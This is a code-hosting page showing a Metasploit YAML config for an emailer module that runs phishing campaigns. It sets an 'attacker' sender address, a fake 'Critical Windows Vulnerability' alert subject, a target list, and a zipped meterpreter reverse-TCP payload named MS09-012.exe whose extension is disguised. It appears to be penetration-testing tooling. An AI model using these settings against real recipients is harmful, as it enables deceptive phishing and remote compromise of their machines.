Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/data/emailer_config.yaml
Views: 11703
# YAML:1.01# Configuration file for emailer.rb module2# Taken from Jabra spl0it.org3#4# Emails CSV File (Fname Lname,email)5to: /tmp/targets.csv6# Email is sent from this address7from: attacker@metasf.com8# Subject9subject: "[SECURITY-ALERT] Critical Windows Vulnerability"10# Type ( text or text/html )11type: text/html12# Msg body file13msg_file: /tmp/email_body.txt14# Number of seconds to wait before next email15wait: 516# Prepend the first name to the email body17add_name: true18# Add custom signature from file19sig: true20# Signature file21sig_file: /tmp/sig.txt2223#### Attachment Information ####24# Add an email attachment (File exploit anyone?)25attachment: true26# Path to file attachment27attachment_file: test.jpg28# Name of file attachment29attachment_file_name: msf.jpg30# Type of attachment31attachment_file_type: image/jpeg3233#### Metasploit/Payload Creation ####34# create a metasploit payload35make_payload: true36# zip the payload37zip_payload: true38# metasploit server ip39msf_ip: 127.0.0.140# metasploit server port41msf_port: 44342# metasploit payload43msf_payload: windows/meterpreter/reverse_tcp44# metasploit payload45msf_filename: MS09-012.exe46# metasploit location47msf_location: /pentest/exploits/framework348# change the extension49msf_change_ext: true50# new extension51msf_payload_ext: vxe525354